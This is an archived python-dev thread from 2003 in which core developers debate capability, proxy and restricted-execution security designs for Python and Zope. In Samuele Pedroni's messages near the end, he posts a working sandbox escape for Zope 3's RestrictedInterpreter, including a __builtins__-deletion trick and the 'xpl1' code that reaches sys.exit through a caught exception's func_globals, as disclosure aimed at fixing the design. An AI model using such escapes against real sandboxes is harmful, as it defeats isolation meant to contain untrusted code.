[Moving a discussion about capabilities to where it arguably belongs] [Ben Laurie]
The point about capabilities is that mere possession of a capability is all that is required to exercise it. If you start adding security checkers to them, then you don't have capabilities anymore. But the point is somewhat deeper that than - given capabilities, you can implement proxies without requiring any more infrastructure - you can also implement security schemes that don't really correspond to any kind of security checking at all (ok, you can probably find some convoluted way to achieve the same effect, but I'll bet it comes down to having tokens that correspond to proxies, and security checkers that allow you to proceed if you have the appropriate token - in other words, capabilities, but very hard to use).
So, it seems to me, its simpler and more powerful to start with capabilities and build proxies on top of them (or whatever alternate scheme you want to build).
Once more, my apologies for not just getting straight to the point.
BTW, if you would like to explain why you don't think bound methods are the way to go on python-dev, I'd love to hear it.
It seems to e a matter of convenience. Often objects have many methods to which you want to provide access as a group. E.g. I might have a service configuration registry object. The object behaves roughly like a dictionary. A certain user may be given read-only access to the registry. Using capabilities, I would have to hand her a bunch of capabilities for various methods: __getitem__, has_key, get, keys, items, values, and many more. Using proxies I can simply give her a read-only proxy for the object. So proxies are more powerful. Before you start saying that we should use capabilities as the more fundamental mechanism and build proxies on top of that: as you point out, we already have an equivalent more fundamental mechanism, bound methods, which is equivalent to capabilities. It's just that raw capabilities aren't very usable, so one way or another we've got to build something on top of that. --Guido van Rossum (home page: http://www.python.org/~guido/)
Guido van Rossum wrote:
[Moving a discussion about capabilities to where it arguably belongs]
[Ben Laurie]
The point about capabilities is that mere possession of a capability is all that is required to exercise it. If you start adding security checkers to them, then you don't have capabilities anymore. But the point is somewhat deeper that than - given capabilities, you can implement proxies without requiring any more infrastructure - you can also implement security schemes that don't really correspond to any kind of security checking at all (ok, you can probably find some convoluted way to achieve the same effect, but I'll bet it comes down to having tokens that correspond to proxies, and security checkers that allow you to proceed if you have the appropriate token - in other words, capabilities, but very hard to use).
So, it seems to me, its simpler and more powerful to start with capabilities and build proxies on top of them (or whatever alternate scheme you want to build).
Once more, my apologies for not just getting straight to the point.
BTW, if you would like to explain why you don't think bound methods are the way to go on python-dev, I'd love to hear it.
It seems to e a matter of convenience. Often objects have many methods to which you want to provide access as a group. E.g. I might have a service configuration registry object. The object behaves roughly like a dictionary. A certain user may be given read-only access to the registry. Using capabilities, I would have to hand her a bunch of capabilities for various methods: __getitem__, has_key, get, keys, items, values, and many more. Using proxies I can simply give her a read-only proxy for the object. So proxies are more powerful.
Before you start saying that we should use capabilities as the more fundamental mechanism and build proxies on top of that: as you point out, we already have an equivalent more fundamental mechanism, bound methods, which is equivalent to capabilities. It's just that raw capabilities aren't very usable, so one way or another we've got to build something on top of that.
I'm not trying to persuade you that capabilities are better than proxies. I'd prefer to build on them, and it seems you'd prefer to do it another way. That's fine with me - my goal is to make capabilities both possible and easily usable in Python, not to persuade everyone to use them (yet ;-). Bound methods are not capabilities unless they are secured. It seems the correct way to do this is to use restricted execution, and perhaps some other tricks. What I am trying to nail down is exactly what needs doing to get us from where we are now to where capabilities actually work. As I understand it, what is needed is: a) Fix restricted execution, which is in a state of disrepair b) Override import, open (and other stuff? what?) c) Wrap or replace some of the existing libraries, certify that others are "safe" It looks to me like a and b are shared with proxies, and c would be different, by definition. Is there anything else? Am I on the wrong track? I am going to write this all up into a document which can be used as a starting point for work to complete this. Cheers, Ben. -- http://www.apache-ssl.org/ben.html http://www.thebunker.net/ "There is no limit to what a man can do or how far he can go if he doesn't mind who gets the credit." - Robert Woodruff
From: "Ben Laurie" <ben@algroup.co.uk>
Guido van Rossum wrote:
[Moving a discussion about capabilities to where it arguably belongs]
[Ben Laurie]
The point about capabilities is that mere possession of a capability is all that is required to exercise it. If you start adding security checkers to them, then you don't have capabilities anymore. But the point is somewhat deeper that than - given capabilities, you can implement proxies without requiring any more infrastructure - you can also implement security schemes that don't really correspond to any kind of security checking at all (ok, you can probably find some convoluted way to achieve the same effect, but I'll bet it comes down to having tokens that correspond to proxies, and security checkers that allow you to proceed if you have the appropriate token - in other words, capabilities, but very hard to use).
So, it seems to me, its simpler and more powerful to start with capabilities and build proxies on top of them (or whatever alternate scheme you want to build).
Once more, my apologies for not just getting straight to the point.
BTW, if you would like to explain why you don't think bound methods are the way to go on python-dev, I'd love to hear it.
It seems to e a matter of convenience. Often objects have many methods to which you want to provide access as a group. E.g. I might have a service configuration registry object. The object behaves roughly like a dictionary. A certain user may be given read-only access to the registry. Using capabilities, I would have to hand her a bunch of capabilities for various methods: __getitem__, has_key, get, keys, items, values, and many more. Using proxies I can simply give her a read-only proxy for the object. So proxies are more powerful.
Before you start saying that we should use capabilities as the more fundamental mechanism and build proxies on top of that: as you point out, we already have an equivalent more fundamental mechanism, bound methods, which is equivalent to capabilities. It's just that raw capabilities aren't very usable, so one way or another we've got to build something on top of that.
I'm not trying to persuade you that capabilities are better than proxies. I'd prefer to build on them, and it seems you'd prefer to do it another way. That's fine with me - my goal is to make capabilities both possible and easily usable in Python, not to persuade everyone to use them (yet ;-).
Bound methods are not capabilities unless they are secured. It seems the correct way to do this is to use restricted execution, and perhaps some other tricks. What I am trying to nail down is exactly what needs doing to get us from where we are now to where capabilities actually work. As I understand it, what is needed is:
a) Fix restricted execution, which is in a state of disrepair
b) Override import, open (and other stuff? what?)
c) Wrap or replace some of the existing libraries, certify that others are "safe"
It looks to me like a and b are shared with proxies, and c would be different, by definition. Is there anything else? Am I on the wrong track?
there is a difference: proxies cover indipendently much of the holes in restricted execution ... about restricted execution: - the way a new frame acquires the default built-ins vs. installed resticted bult-ins is likely correct but needs auditing; e.g. the last problem fixed related to this was: http://python.org/sf/577530 - under restricted execution some operation, in particular reflective ops ought to be prohibited, the code that implements this is scattered and/because this operations share the same execution paths with "normal" ops; so the first thing is enumerate all that should be prohibited, or devise an approach to security that can work with just a minimal set of guarantees (disabled ops and/or encapsulated objects) These were e.g. identified "problems": http://mail.python.org/pipermail/python-dev/2002-December/031160.html http://mail.python.org/pipermail/python-dev/2003-January/031851.html
What I am trying to nail down is exactly what needs doing to get us from where we are now to where capabilities actually work. As I understand it, what is needed is:
a) Fix restricted execution, which is in a state of disrepair
Yes.
b) Override import, open (and other stuff? what?)
Don't worry about this; it's taken care of by the rexec module; each application will probably want to do this a little differently (certainly Zope has its own way).
c) Wrap or replace some of the existing libraries, certify that others are "safe"
This should only be necessary for (core and 3rd party) extension modules. The rexec module has a framework for this.
It looks to me like a and b are shared with proxies, and c would be different, by definition. Is there anything else? Am I on the wrong track?
I don't know why you think (c) is different.
I am going to write this all up into a document which can be used as a starting point for work to complete this.
Excellent. --Guido van Rossum (home page: http://www.python.org/~guido/)
Guido van Rossum wrote:
What I am trying to nail down is exactly what needs doing to get us from where we are now to where capabilities actually work. As I understand it, what is needed is:
a) Fix restricted execution, which is in a state of disrepair
Yes.
b) Override import, open (and other stuff? what?)
Don't worry about this; it's taken care of by the rexec module; each application will probably want to do this a little differently (certainly Zope has its own way).
I believe I heard way back that there was a lack of confidence rexec overrode everything that needed overriding - or am I getting mixed up with restricted execution?
c) Wrap or replace some of the existing libraries, certify that others are "safe"
This should only be necessary for (core and 3rd party) extension modules. The rexec module has a framework for this.
It looks to me like a and b are shared with proxies, and c would be different, by definition. Is there anything else? Am I on the wrong track?
I don't know why you think (c) is different.
Because with proxies you'd wrap with proxies, and with capabilities you'd wrap with capabilities. Or do you think there's a way that would work for both (which would, of course, be great)? Cheers, Ben. -- http://www.apache-ssl.org/ben.html http://www.thebunker.net/ "There is no limit to what a man can do or how far he can go if he doesn't mind who gets the credit." - Robert Woodruff
b) Override import, open (and other stuff? what?)
Don't worry about this; it's taken care of by the rexec module; each application will probably want to do this a little differently (certainly Zope has its own way).
I believe I heard way back that there was a lack of confidence rexec overrode everything that needed overriding - or am I getting mixed up with restricted execution?
Indeed.
c) Wrap or replace some of the existing libraries, certify that others are "safe"
This should only be necessary for (core and 3rd party) extension modules. The rexec module has a framework for this.
It looks to me like a and b are shared with proxies, and c would be different, by definition. Is there anything else? Am I on the wrong track?
I don't know why you think (c) is different.
Because with proxies you'd wrap with proxies, and with capabilities you'd wrap with capabilities. Or do you think there's a way that would work for both (which would, of course, be great)?
OK, fair enough. --Guido van Rossum (home page: http://www.python.org/~guido/)
On Sat, 8 Mar 2003, Ben Laurie wrote:
c) Wrap or replace some of the existing libraries, certify that others are "safe"
This should only be necessary for (core and 3rd party) extension modules. The rexec module has a framework for this.
It looks to me like a and b are shared with proxies, and c would be different, by definition. Is there anything else? Am I on the wrong track?
I don't know why you think (c) is different.
Because with proxies you'd wrap with proxies, and with capabilities you'd wrap with capabilities. Or do you think there's a way that would work for both (which would, of course, be great)?
This doesn't make any sense to me. The standard libraries would provide proxy wrappers in either caes. The rexec vs. proxy issue doesn't enter into it. By the way -- to avoid confusion between "proxies used to wrap unrestricted objects in order to make them into secure objects" and "proxies used to reduce the interface of an existing secure object", let's call the first "proxy" (as has been used in the "rexec vs. proxy" discussion so far), and call the second a "facet" (which is the term commonly used when capabilities people talk about reducing an interface). We often talk about providing, say, a "read-only facet" on an object. -- ?!ng
Ka-Ping Yee wrote:
On Sat, 8 Mar 2003, Ben Laurie wrote:
c) Wrap or replace some of the existing libraries, certify that others are "safe"
This should only be necessary for (core and 3rd party) extension modules. The rexec module has a framework for this.
It looks to me like a and b are shared with proxies, and c would be different, by definition. Is there anything else? Am I on the wrong track?
I don't know why you think (c) is different.
Because with proxies you'd wrap with proxies, and with capabilities you'd wrap with capabilities. Or do you think there's a way that would work for both (which would, of course, be great)?
This doesn't make any sense to me. The standard libraries would provide proxy wrappers in either caes. The rexec vs. proxy issue doesn't enter into it.
We've got too much overloading here! I meant "proxy" as in "Zope proxy". Yes, in either case they'll be wrapped in some kind of (non-Zope) proxy, but the actual wrapper would be different.
By the way -- to avoid confusion between "proxies used to wrap unrestricted objects in order to make them into secure objects" and "proxies used to reduce the interface of an existing secure object", let's call the first "proxy" (as has been used in the "rexec vs. proxy" discussion so far), and call the second a "facet" (which is the term commonly used when capabilities people talk about reducing an interface). We often talk about providing, say, a "read-only facet" on an object.
This would be more applicable to an object-based capability model, which Jim and Guido seem to favour. In fact, perhaps it would be nicest to be able to do both - i.e. bound methods _and_ opaque objects. Then we'd all be happy. Cheers, Ben. -- http://www.apache-ssl.org/ben.html http://www.thebunker.net/ "There is no limit to what a man can do or how far he can go if he doesn't mind who gets the credit." - Robert Woodruff
[Ping]
By the way -- to avoid confusion between "proxies used to wrap unrestricted objects in order to make them into secure objects" and "proxies used to reduce the interface of an existing secure object", let's call the first "proxy" (as has been used in the "rexec vs. proxy" discussion so far), and call the second a "facet" (which is the term commonly used when capabilities people talk about reducing an interface). We often talk about providing, say, a "read-only facet" on an object.
Hm, I'm not sure I understand the difference between the two definitions you give. What does "making something into a secure object" mean if not "reducing its interface"? And what is the fundamental difference between a secure object and an insecure one? In my world view there's a gradual difference. The only truly secure object is None. :-) --Guido van Rossum (home page: http://www.python.org/~guido/)
Guido van Rossum wrote The only truly secure object is None. :-)
You sure?
None.__class__.__class__.mro(type(None))[1] <type 'object'>
Not sure what else it's possible to get to from None... Anthony -- Anthony Baxter <anthony@interlink.com.au> It's never too late to have a happy childhood.
On Mon, 10 Mar 2003, Guido van Rossum wrote:
[Ping]
By the way -- to avoid confusion between "proxies used to wrap unrestricted objects in order to make them into secure objects" and "proxies used to reduce the interface of an existing secure object", let's call the first "proxy" (as has been used in the "rexec vs. proxy" discussion so far), and call the second a "facet" (which is the term commonly used when capabilities people talk about reducing an interface).
Hm, I'm not sure I understand the difference between the two definitions you give. What does "making something into a secure object" mean if not "reducing its interface"? And what is the fundamental difference between a secure object and an insecure one? In my world view there's a gradual difference.
I acknowledge that it's not perfectly black and white, but what i meant in the above is that a "secure object" is one that exposes only its declared interface. The key difference i'm getting at is whether the interface is the one intended by the programmer. Proxies are for ensuring that the interface doesn't leak things the programmer never intended; facets are for the programmer to intentionally reduce the interface of an already secure object to limit its powers. Er, perhaps another way of saying it is that proxies are at the system level and facets are at the user level. -- ?!ng
On Sat, 2003-03-08 at 07:27, Ben Laurie wrote:
Bound methods are not capabilities unless they are secured. It seems the correct way to do this is to use restricted execution, and perhaps some other tricks. What I am trying to nail down is exactly what needs doing to get us from where we are now to where capabilities actually work. As I understand it, what is needed is:
a) Fix restricted execution, which is in a state of disrepair
b) Override import, open (and other stuff? what?)
c) Wrap or replace some of the existing libraries, certify that others are "safe"
It looks to me like a and b are shared with proxies, and c would be different, by definition. Is there anything else? Am I on the wrong track?
I have been trying to argue, though I feel a bit muddled at times, that the proxy approach eliminates the need for rexec and makes it possible to build a "restricted environment" without relying on the rexec code in the interpreter. Any security scheme needs some kind of information hiding to guarantee that untrusted code does not break into the representation of an object, so that, for example, an object can be used as a capability. I think we've discussed two different ways to implement information hiding. The rexec approach is to add code to the interpreter to disable certain introspection features when running untrusted code. The proxy approach is to wrap protected objects in proxies before passing them to untrusted code. I think both techniques achieve the same end, but with different limitations. I prefer the proxy approach because it is more self contained. The rexec approach requires that all developers working in the core on introspection features be aware of security issues. The security kernel ends up being most of the core interpreter -- anything that can introspection on objects. The proxy approach is to create an object that specifically disables introspection by not exposing internals to the core. We need to do some more careful analysis to be sure that proxies really achieve the goal of information hiding. I think another benefit of proxies vs. rexec is that untrusted code can still use all of the standard introspection features when dealing with objects it creates itself. Code running in rexec can't use any introspective feature, period, because all those features are disabled. With the proxy approach, introspection is only disabled on protected objects.
I am going to write this all up into a document which can be used as a starting point for work to complete this.
It sounds like a PEP would be the right thing. It would be nice if the PEP could explain the rationale for a secure Python environment and then develop (at least) the capability approach to building that environment. Perhaps I could chip in with some explanation of the proxy approach. Jeremy
[Jeremy]
I have been trying to argue, though I feel a bit muddled at times, that the proxy approach eliminates the need for rexec and makes it possible to build a "restricted environment" without relying on the rexec code in the interpreter.
There's one rexec-related feature that you'll need to use though: that all built-ins (including __import__) are loaded from the __builtins__ variable in the globals, and that there's no way to get access to the default __builtins__ (assuming the restricted builtins override __import__ with something that won't let you import the real sys module, etc.). I mention this because this is actually a larger part of the restricted execution code than the restrictions on certain introspections that are also part of it. The latter are clearly not enough, and perhaps we should drop them (*requiring* proxies or capabilities to implement the rexec module, rather than the old and wounded Bastion [see Samuele's posts]). But the former (the treatment of __builtins__) is essential. Perhaps mostly unrelated, I'll also note something about proxy implementation. Assuming proxies are instances of a type proxy, that type must derive from a type object. This means that if p is a proxy, object.__getattribute__(p, 'foo') is valid. It will take some very careful analysis to prove that this cannot circumvent the proxy's safeguards. (I believe Zope's proxies are safe.) --Guido van Rossum (home page: http://www.python.org/~guido/)
Jeremy Hylton wrote:
On Sat, 2003-03-08 at 07:27, Ben Laurie wrote:
Bound methods are not capabilities unless they are secured. It seems the correct way to do this is to use restricted execution, and perhaps some other tricks. What I am trying to nail down is exactly what needs doing to get us from where we are now to where capabilities actually work. As I understand it, what is needed is:
a) Fix restricted execution, which is in a state of disrepair
b) Override import, open (and other stuff? what?)
c) Wrap or replace some of the existing libraries, certify that others are "safe"
It looks to me like a and b are shared with proxies, and c would be different, by definition. Is there anything else? Am I on the wrong track?
I have been trying to argue, though I feel a bit muddled at times, that the proxy approach eliminates the need for rexec and makes it possible to build a "restricted environment" without relying on the rexec code in the interpreter.
Any security scheme needs some kind of information hiding to guarantee that untrusted code does not break into the representation of an object, so that, for example, an object can be used as a capability. I think we've discussed two different ways to implement information hiding.
The rexec approach is to add code to the interpreter to disable certain introspection features when running untrusted code.
The proxy approach is to wrap protected objects in proxies before passing them to untrusted code.
I think both techniques achieve the same end, but with different limitations. I prefer the proxy approach because it is more self contained. The rexec approach requires that all developers working in the core on introspection features be aware of security issues. The security kernel ends up being most of the core interpreter -- anything that can introspection on objects. The proxy approach is to create an object that specifically disables introspection by not exposing internals to the core. We need to do some more careful analysis to be sure that proxies really achieve the goal of information hiding.
I think another benefit of proxies vs. rexec is that untrusted code can still use all of the standard introspection features when dealing with objects it creates itself. Code running in rexec can't use any introspective feature, period, because all those features are disabled. With the proxy approach, introspection is only disabled on protected objects.
These are all good points. Proxies have a dark side though. They sometimes trip up standard facilities in Python that either depend on specific types or on identity comparisons. With a bit of effort, proxies can be made highly transparent, but they change an object's type and id. For example, you can't proxy exceptions without breaking exception handling. In Zope, we rely on restricted execution to prevent certian kinds of introspection on exceptions and exception classes. In Zope, we also don't proxy None, because None is usually checked for identity. We also don't proxy strings, and numbers. I think I agree that you could build a restricted environment with proxies alone, but, to do so, you would need to make Python far more proxy aware. I think that the language would need to be aware of proxies at a far deeper level. Jim -- Jim Fulton mailto:jim@zope.com Python Powered! CTO (888) 344-4332 http://www.python.org Zope Corporation http://www.zope.com http://www.zope.org
For example, you can't proxy exceptions without breaking exception handling. In Zope, we rely on restricted execution to
From: "Jim Fulton" <jim@zope.com> prevent
certian kinds of introspection on exceptions and exception classes. In Zope, we also don't proxy None, because None is usually checked for identity. We also don't proxy strings, and numbers.
That was a question I was asking myself about proxies: exception handling. But I never had the time to play with it to check. Does that mean that restricted code can get unproxied instances of classic classes as caught exceptions?
From: "Samuele Pedroni" <pedronis@bluewin.ch>
For example, you can't proxy exceptions without breaking exception handling. In Zope, we rely on restricted execution to
From: "Jim Fulton" <jim@zope.com> prevent
certian kinds of introspection on exceptions and exception classes. In Zope, we also don't proxy None, because None is usually checked for identity. We also don't proxy strings, and numbers.
That was a question I was asking myself about proxies: exception handling. But I never had the time to play with it to check.
Does that mean that restricted code can get unproxied instances of classic classes as caught exceptions?
maybe the question was unclear, but it was serious, what I was asking is whether some restricted code can do: try: deliberate code to force exception except Exception,e: ... so that e is caught unproxied. Looking at zope/security/_proxy.c it seems this can be the case... then to be (likely) on the safe side, all exception class definitions for possible e classes: like e.g. class MyExc(Exception): ... ought to be executed _in restricted mode_, or be "trivial/empty": something like class MyExc(Exception): def __init__(self, msg): self.message = msg Exception.__init__(self, msg) def __str__(self): return self.message is already too much rope. Although it seems not to have the "nice" two-level-of-calls behavior of Bastion instances, an unproxied instance of MyExc if MyExc was defined outside of restricted execution, can be used to break out of restricted execution. regards.
Samuele Pedroni wrote:
From: "Samuele Pedroni" <pedronis@bluewin.ch>
From: "Jim Fulton" <jim@zope.com>
For example, you can't proxy exceptions without breaking exception handling. In Zope, we rely on restricted execution to
prevent
certian kinds of introspection on exceptions and exception classes. In
Zope,
we
also don't proxy None, because None is usually checked for identity. We
also
don't
proxy strings, and numbers.
That was a question I was asking myself about proxies: exception handling. But I never had the time to play with it to check.
Does that mean that restricted code can get unproxied instances of classic classes as caught exceptions?
maybe the question was unclear,
I think it was clear.
but it was serious, what I was asking is whether some restricted code can do:
try: deliberate code to force exception except Exception,e: ...
so that e is caught unproxied.
Right. e is caught unproxied.
Looking at zope/security/_proxy.c it seems this can be the case...
Yes,
then to be (likely) on the safe side, all exception class definitions for possible e classes: like e.g.
class MyExc(Exception): ...
ought to be executed _in restricted mode_, or be "trivial/empty": something like
class MyExc(Exception): def __init__(self, msg): self.message = msg Exception.__init__(self, msg)
def __str__(self): return self.message
is already too much rope.
I'm not sure if you are saying that this examples is "trivial/empty" or not. It seems that yuo are saying that it is not trvial enough. If so, why?
Although it seems not to have the "nice" two-level-of-calls behavior of Bastion instances, an unproxied instance of MyExc if MyExc was defined outside of restricted execution, can be used to break out of restricted execution.
How can it be used to break out of restricted execution? I see three risks: 1. The exception provides methods to do harmful things, such as create side effects or provide access to data outside the exception. 2. The exception creates data that needs to be protected. For example Zope uses a NotFoundError exception taht contains an object being searched. 3. The exception methods meta data provide access to module globals. Risk 1 needs to be mitigated through proper exception design. Exceptions need to be limited in what their methods do. This is a bit brittle, but all standard exceptions have this property. Risk 2 is mitigated by proxying exception instance data. Proxies can do this. This is what we've decided to do, although we haven't implemented it yet. Risk 3 is mitigated by restricted execution. Have I missed anything? Jim -- Jim Fulton mailto:jim@zope.com Python Powered! CTO (888) 344-4332 http://www.python.org Zope Corporation http://www.zope.com http://www.zope.org
How can it be used to break out of restricted execution?
I see three risks:
1. The exception provides methods to do harmful things, such as create side effects or provide access to data outside the exception.
2. The exception creates data that needs to be protected. For example Zope uses a NotFoundError exception taht contains an object being searched.
3. The exception methods meta data provide access to module globals.
Risk 1 needs to be mitigated through proper exception design. Exceptions need to be limited in what their methods do. This is a bit brittle, but all standard exceptions have this property.
Risk 2 is mitigated by proxying exception instance data. Proxies can do
From: "Jim Fulton" <jim@zope.com> this.
This is what we've decided to do, although we haven't implemented it yet.
Risk 3 is mitigated by restricted execution.
Have I missed anything?
OK, I have had the time to really try what I was thinking about. I have not found a way to really break out from restricted execution (does not mean I'm sure there isn't) BUT: I'm considering: - Python 2.2.2 - Zope 3 3.0a1 and zope.security.interpreter.RestrictedInterpreter with zope.security.simplepolicies.ParanoidSecurityPolicy (the default) so 1. a bug (rexec had it too). If I remember correctly the solution is re-injecting __builtins__ before each exec C:\transit\Zope3-3.0a1\src\zope\security>\usr\python22\python Python 2.2.2 (#37, Oct 14 2002, 17:02:34) [MSC 32 bit (Intel)] on win32 Type "help", "copyright", "credits" or "license" for more information.
import sys sys.path.append('..\..') from zope.security.interpreter import RestrictedInterpreter ri=RestrictedInterpreter() ri.ri_exec("class A: pass") ri.ri_exec("print A.__dict__") Traceback (most recent call last): File "<stdin>", line 1, in ? File "..\..\zope\security\interpreter.py", line 32, in ri_exec exec code in self.globals File "<string>", line 1, in ? RuntimeError: class.__dict__ not accessible in restricted mode ri.ri_exec("del __builtins__") ri.ri_exec("print A.__dict__") {'__module__': '__builtin__', '__doc__': None}
or be sure to call ri_exec only once on each RestrictedInterpreter instance. Assuming that fixed: 2. If code executed under a RestrictedInterpreter could obtain a MyExc instance and had a working unproxied/non-proxying 'property' built-in, it could very likely break out from restricted execution. Fortunately the 'property' passed to such code is not working. Given that that's not the case I skip the illustration. 3. How much this scenario is likely really depend on how RestrictedInterpreter is used, how and where exceptions are defined, if really restricted code can manage to get an instance of one of them ... if further restrictions e.g. on subclassing are added or removed ... if the general situation of restricted execution and new-style classes improve. All of this I don't know. Here I consider: a "dangerous" function ('sys.exit') is imported in the same module where MyExc is defined, MyExc is not defined under restricted execution, a proxied function is passed to restricted code such that it can capture an instance of MyExc (as I said whether this set of things is likely/unlikely I don't know): <s.py> import sys from sys import exit # !!! same module as MyExc sys.path.append('C:/transit/Zope3-3.0a1/src') from zope.security.interpreter import RestrictedInterpreter from zope.security.checker import ProxyFactory class MyExc(Exception): # !!! definition outside of resticted execution def __init__(self,msg): self.message = msg Exception.__init__(self,msg) def __str__(self): return self.message def myfunc(): raise MyExc('foo') ri = RestrictedInterpreter() ri.globals['myfunc'] = ProxyFactory(myfunc) f = open('c:/Documenti/x.txt','r') code = f.read() f.close() ri.ri_exec(code) print "OK" </s.py> Anyway I have a _very baroque_ x.txt that manages to call sys.exit. regards
I posted
<s.py> [...]
class MyExc(Exception): # !!! definition outside of resticted execution def __init__(self,msg): self.message = msg Exception.__init__(self,msg)
def __str__(self): return self.message
def myfunc(): raise MyExc('foo')
ri = RestrictedInterpreter()
ri.globals['myfunc'] = ProxyFactory(myfunc)
f = open('c:/Documenti/x.txt','r') code = f.read() f.close()
ri.ri_exec(code)
print "OK" </s.py>
Anyway I have a _very baroque_ x.txt that manages to call sys.exit.
attached is a modified version of s.py that takes a filename for the code to run inside the RestrictedInterpreter. Also myfunc is now myexc_source . There is also a new function candy, next mail on that. Here is a run with xpl1 (was x.txt): ...>\usr\python22\python -i s.py xpl1 restricted execution no exit cannot access sys.exit directly Got sys.exit ...> no OK, no Python prompt ! here is xpl1 code [warning: metaclasses, descriptors usage, functional programming ahead :)] [some things are artifacts of the non-deliberate limitations inside RestrictedInterpreter] #Object = ''.__class__.__base__ Type = ''.__class__.__class__ class Iter: __metaclass__ = Type def __init__(self,v): self.v = v self.i = 0 def __iter__(self): return self def next(self): try: v = self.v[self.i] self.i += 1 return v except IndexError: raise StopIteration class consta: __metaclass__ = Type def __init__(self,o): self.o = o def __get__(self,obj,typ): return self.o # try: myexc_source() except Exception,e: pass MyExc = e.__class__ e__str__ = e.__str__ # try: e__str__.func_globals except: print "restricted execution" try: exit(0) except: print "no exit" try: import sys sys.exit(0) except: print "cannot access sys.exit directly" # class Y: class __metaclass__(Type): def __iter__(cls): return Iter(['func_globals']) class X(Y,MyExc): message = None __call__ = consta(getattr) def __iter__(self): return Iter([e__str__]) #def __get__(self,x,X): # print self,x,y # return map(self,x,X) __get__ = map # x isinst MyExc # x.message === x.__get__(x,X) === map(x,x,X) # x(o,a) === getattr(o,a) # map(None,x) === [e__str__] # map(None,X) === ['func_globals'] x=X() X.message = x g = MyExc.__str__(x) print "Got sys.exit" g[0]['exit'](0)
[me]
attached is a modified version of s.py that takes a filename for the code to run inside the RestrictedInterpreter. Also myfunc is now myexc_source . There is also a new function candy, next mail on that.
Consider from s.py: -- * -- from sys import exit ... def candy(s): if s == "yes": return 'candy' else: return 'none' ri = RestrictedInterpreter() ri.globals['candy'] = ProxyFactory(candy) ... ri.ri_exec(code) print "OK" -- * -- No unproxied exceptions, on the other hand both rexec and the prototype RestrictedIntrepreter supply code with globals() [!], and apply() ... I have some _even more baroque_ code (xpl2) that exploits candy and manages to call sys.exit: ...>\usr\python22\python -i s.py xpl2 candy Got sys.exit ...> In this case xpl2 could be rewritten as a single expression of the form: candy(...) although that would make for a totally masochistic exercise and a total obfuscated python entry. No, I haven't done/ tried that :) regards.
On Sun, 2003-03-09 at 14:09, Samuele Pedroni wrote:
maybe the question was unclear, but it was serious, what I was asking is whether some restricted code can do:
try: deliberate code to force exception except Exception,e: ...
so that e is caught unproxied. Looking at zope/security/_proxy.c it seems this can be the case...
then to be (likely) on the safe side, all exception class definitions for possible e classes: like e.g.
class MyExc(Exception): ...
ought to be executed _in restricted mode_, or be "trivial/empty": something like
class MyExc(Exception): def __init__(self, msg): self.message = msg Exception.__init__(self, msg)
def __str__(self): return self.message
is already too much rope.
Although it seems not to have the "nice" two-level-of-calls behavior of Bastion instances, an unproxied instance of MyExc if MyExc was defined outside of restricted execution, can be used to break out of restricted execution.
Exceptions do seem like a problem. If the exception objects are defined in the safe interpreter, then untrusted code that catches an exception can't follow references to an unsafe interpreter. But it can modify the exception objects and classes, which has the potential to cause a lot of problems. It also complicates the design of systems that want to run untrusted code, because they must be very careful never to pass trusted exception instances to untrusted code. It seems like it would be nice if proxies could be used as exceptions, so that there was a simple mechanism to enforce protection. Jeremy
Samuele Pedroni wrote:
From: "Jim Fulton" <jim@zope.com>
For example, you can't proxy exceptions without breaking exception handling. In Zope, we rely on restricted execution to
prevent
certian kinds of introspection on exceptions and exception classes. In Zope,
we
also don't proxy None, because None is usually checked for identity. We also
don't
proxy strings, and numbers.
That was a question I was asking myself about proxies: exception handling. But I never had the time to play with it to check.
Does that mean that restricted code can get unproxied instances of classic classes as caught exceptions?
Right. What we can (and will do) is intercept the exceptions and proxy the exception's instance data. So we'll be relying on restricted execution to protect the exception method meta data and on proxies to protect the exception data. Of course, we'd prefer to be able to proxy the the exception instances themselves. Jim -- Jim Fulton mailto:jim@zope.com Python Powered! CTO (888) 344-4332 http://www.python.org Zope Corporation http://www.zope.com http://www.zope.org
Jeremy Hylton wrote:
On Sat, 2003-03-08 at 07:27, Ben Laurie wrote:
Bound methods are not capabilities unless they are secured. It seems the correct way to do this is to use restricted execution, and perhaps some other tricks. What I am trying to nail down is exactly what needs doing to get us from where we are now to where capabilities actually work. As I understand it, what is needed is:
a) Fix restricted execution, which is in a state of disrepair
b) Override import, open (and other stuff? what?)
c) Wrap or replace some of the existing libraries, certify that others are "safe"
It looks to me like a and b are shared with proxies, and c would be different, by definition. Is there anything else? Am I on the wrong track?
I have been trying to argue, though I feel a bit muddled at times, that the proxy approach eliminates the need for rexec and makes it possible to build a "restricted environment" without relying on the rexec code in the interpreter.
Wouldn't that suggest that the way to fix restricted execution is to do something proxylike, then?
Any security scheme needs some kind of information hiding to guarantee that untrusted code does not break into the representation of an object, so that, for example, an object can be used as a capability. I think we've discussed two different ways to implement information hiding.
Yes.
The rexec approach is to add code to the interpreter to disable certain introspection features when running untrusted code.
The proxy approach is to wrap protected objects in proxies before passing them to untrusted code.
Again, this suggests to me that perhaps restricted execution should also use wrapping. I guess I will study this idea in more detail when I start writing.
I think both techniques achieve the same end, but with different limitations. I prefer the proxy approach because it is more self contained. The rexec approach requires that all developers working in the core on introspection features be aware of security issues. The security kernel ends up being most of the core interpreter -- anything that can introspection on objects. The proxy approach is to create an object that specifically disables introspection by not exposing internals to the core. We need to do some more careful analysis to be sure that proxies really achieve the goal of information hiding.
If restricted execution were implemented in the same way, then proxies and restricted execution would both benefit from this analysis.
I think another benefit of proxies vs. rexec is that untrusted code can still use all of the standard introspection features when dealing with objects it creates itself. Code running in rexec can't use any introspective feature, period, because all those features are disabled. With the proxy approach, introspection is only disabled on protected objects.
Right - this does seem like a desirable feature.
I am going to write this all up into a document which can be used as a starting point for work to complete this.
It sounds like a PEP would be the right thing. It would be nice if the PEP could explain the rationale for a secure Python environment and then develop (at least) the capability approach to building that environment. Perhaps I could chip in with some explanation of the proxy approach.
That would be excellent! I will write a draft as specified in PEP 1. Cheers, Ben. -- http://www.apache-ssl.org/ben.html http://www.thebunker.net/ "There is no limit to what a man can do or how far he can go if he doesn't mind who gets the credit." - Robert Woodruff
Jeremy Hylton wrote: ...
I think both techniques achieve the same end, but with different limitations. I prefer the proxy approach because it is more self contained. The rexec approach requires that all developers working in the core on introspection features be aware of security issues. The security kernel ends up being most of the core interpreter -- anything that can introspection on objects.
I think that there is an important corrolary. Changes to the security policy are very hard to make. For example, if we change our mind about what should be safe or not: we have many places to make the change, we have lot's of tests to redo. people have to reinstall or rebuild Python to get the change. With proxies, the update is provides as fairly small and self-contained library update. Jim -- Jim Fulton mailto:jim@zope.com Python Powered! CTO (888) 344-4332 http://www.python.org Zope Corporation http://www.zope.com http://www.zope.org
Guido van Rossum wrote:
